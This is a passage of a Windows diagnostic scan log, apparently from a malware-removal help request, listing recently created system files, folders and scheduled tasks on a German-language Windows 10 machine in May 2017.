2017-05-09 21:39 - 2017-04-28 02:09 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-05-09 21:39 - 2017-04-28 02:09 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\webplatstorageserver.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00314880 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-05-09 21:39 - 2017-04-28 02:08 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-05-09 21:39 - 2017-04-28 02:07 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-05-09 21:39 - 2017-04-28 02:06 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 01075712 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-05-09 21:39 - 2017-04-28 02:05 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-05-09 21:39 - 2017-04-28 02:04 - 23681024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 01878016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-05-09 21:39 - 2017-04-28 02:04 - 00416256 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-05-09 21:39 - 2017-04-28 02:03 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 01027584 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00925696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-05-09 21:39 - 2017-04-28 02:03 - 00056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-05-09 21:39 - 2017-04-28 02:02 - 01260544 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-05-09 21:39 - 2017-04-28 02:01 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-05-09 21:39 - 2017-04-28 02:01 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-05-09 21:39 - 2017-04-28 02:00 - 08244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-05-09 21:39 - 2017-04-28 01:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-05-09 21:39 - 2017-04-28 01:59 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-05-09 21:39 - 2017-04-28 01:58 - 12787200 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-05-09 21:39 - 2017-04-28 01:58 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-05-09 21:39 - 2017-04-28 01:57 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-05-09 21:39 - 2017-04-28 01:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-05-09 21:39 - 2017-04-28 01:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-05-09 21:39 - 2017-04-28 01:54 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-05-09 21:39 - 2017-04-28 01:52 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.ps.dll
2017-05-08 21:19 - 2017-05-08 21:19 - 00001654 _____ C:\Users\Public\Desktop\Launch Monitor Driver Installer.lnk
2017-05-08 21:18 - 2017-05-08 21:19 - 00000000 ____D C:\Program Files (x86)\MonitorDriver
2017-05-07 21:26 - 2017-05-07 21:26 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-05-07 21:24 - 2017-05-07 21:24 - 00000020 ___SH C:\Users\Dino\ntuser.ini
2017-05-07 21:24 - 2017-05-07 21:24 - 00000000 ____D C:\Users\Dino\AppData\Local\DBG
2017-05-07 18:11 - 2017-05-07 18:11 - 20374424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04848440 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02651648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02435584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02298880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-21 21:01 - 01992350 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-21 20:55 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00023140 _____ C:\WINDOWS\System32\Tasks\{0E0E0947-0F0F-7D0F-7D11-0E0F78051104}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten
2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-21 20:55 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
